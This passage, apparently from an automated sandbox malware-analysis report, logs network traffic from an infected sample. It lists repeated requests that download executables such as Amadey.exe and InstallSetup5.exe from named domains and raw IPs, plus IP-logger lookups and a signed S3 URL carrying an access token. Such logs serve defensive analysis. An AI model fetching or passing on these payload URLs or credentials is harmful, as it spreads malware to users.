sgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 83.219.145.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.169.154.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.163.201.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 36.94.234.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 102.215.65.250
                  Source: unknownTCP traffic detected without corresponding DNS query: 154.12.253.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 119.93.129.34
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.164.240.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.122.86.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.76.188.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.66.245.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.16.25.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.38.231.41
                  Source: unknownTCP traffic detected without corresponding DNS query: 189.91.85.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.32.131.86
                  Source: unknownTCP traffic detected without corresponding DNS query: 102.68.128.212
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.170.152.189
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.67.200.220
                  Source: unknownTCP traffic detected without corresponding DNS query: 181.88.73.150
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.2.73.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.78.201.242
                  Source: unknownTCP traffic detected without corresponding DNS query: 180.191.254.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.164.163.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.63.12.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.136.78.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.204.219.231
                  Source: unknownTCP traffic detected without corresponding DNS query: 31.42.184.146
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.163.200.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 36.95.102.111
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 167.86.74.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.172.75.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 203.74.125.18
                  Source: unknownTCP traffic detected without corresponding DNS query: 154.65.39.8
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.231.199.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.3.77.204
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.169.181.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 170.238.160.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.16.224.33
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,15_2_00404C70
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ukzbu+vH1LRx6rZ&MD=mpFDpHgu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1lyxz HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /1wxS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: nonesec-fetch-user: ?1upgrade-insecure-requests: 1Host: grabify.org
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET 